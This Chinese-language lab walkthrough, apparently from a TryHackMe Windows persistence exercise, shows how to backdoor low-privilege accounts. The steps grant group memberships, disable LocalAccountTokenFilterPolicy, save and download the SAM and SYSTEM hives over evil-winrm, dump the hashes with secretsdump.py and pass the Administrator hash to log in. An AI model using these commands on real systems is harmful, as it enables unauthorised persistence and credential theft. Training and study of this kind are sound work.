篡改非特权帐户
分配组成员资格
C:\> net localgroup administrators thmuser0 /add
这将允许您使用 RDP、WinRM 或任何其他可用的远程管理服务来访问服务器。
如果这看起来太可疑,您可以使用Backup Operators组。该组中的用户没有管理权限,但可以读取/写入系统上的任何文件或注册表项,而忽略任何已配置的 DACL。这将允许我们复制 SAM 和 SYSTEM 注册表配置单元的内容,然后我们可以使用它们来恢复所有用户的密码哈希,使我们能够轻松升级到任何管理帐户
为此,我们首先将帐户添加到 Backup Operators 组:
C:\> net localgroup "Backup Operators" thmuser1 /add
由于这是一个非特权帐户,除非我们将其添加到远程桌面用户(RDP) 或远程管理用户(WinRM) 组,否则它无法通过 RDP 或 WinRM 返回计算机。我们将使用 WinRM 来完成这项任务:
C:\> net localgroup "Remote Management Users" thmuser1 /add
如果您现在尝试从您的攻击者机器连接,您会惊讶地发现即使您在 Backups Operators 组中,并且您也无法按预期访问所有文件。快速检查我们分配的组会表明我们是 Backup Operators 的一部分,但该组已禁用
user@AttackBox$ evil-winrm -i MACHINE_IP -u thmuser1 -p Password321
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Group used for deny only
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
这是由于用户帐户控制 (UAC)。UAC 实现的功能之一 LocalAccountTokenFilterPolicy会在远程登录时剥夺任何本地帐户的管理权限。虽然您可以从图形用户会话通过 UAC 提升您的权限(在此处阅读有关 UAC 的更多信息),但如果您使用的是 WinRM,您将被限制在没有管理权限的有限访问令牌中。
为了能够从您的用户那里重新获得管理权限,我们必须通过将以下注册表项更改为 1 来禁用LocalAccountTokenFilterPolicy:
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
一旦所有这些都设置好了,我们就可以使用我们的后门用户了。首先,让我们建立一个 WinRM 连接并检查是否为我们的用户启用了 Backup Operators 组:
user@AttackBox$ evil-winrm -i MACHINE_IP -u thmuser1 -p Password321
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
然后我们继续备份 SAM 和 SYSTEM 文件并将它们下载到我们的攻击者机器上:
*Evil-WinRM* PS C:\> reg save hklm\system system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\sam sam.bak
The operation completed successfully.
*Evil-WinRM* PS C:\> download system.bak
Info: Download successful!
*Evil-WinRM* PS C:\> download sam.bak
Info: Download successful!
注意:如果 Evil-WinRM 下载文件的时间太长,请随意使用任何其他传输方法。例如:smbserver.py
使用这些文件,我们可以使用或其他类似工具转储所有用户的密码哈希值secretsdump.py:
user@AttackBox$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x41325422ca00e6552bb6508215d8b426
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1cea1d7e8899f69e89088c4cb4bbdaa3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9657e898170eb98b25861ef9cafe5bd6:::
thmuser1:1011:aad3b435b51404eeaad3b435b51404ee:e41fd391af74400faa4ff75868c93cce:::
[*] Cleaning up...
最后,执行使用管理员的hash连接到受害机器:
攻击箱
user@AttackBox$ evil-winrm -i MACHINE_IP -u Administrator -H 1cea1d7e8899f69e89088c4cb4bbdaa3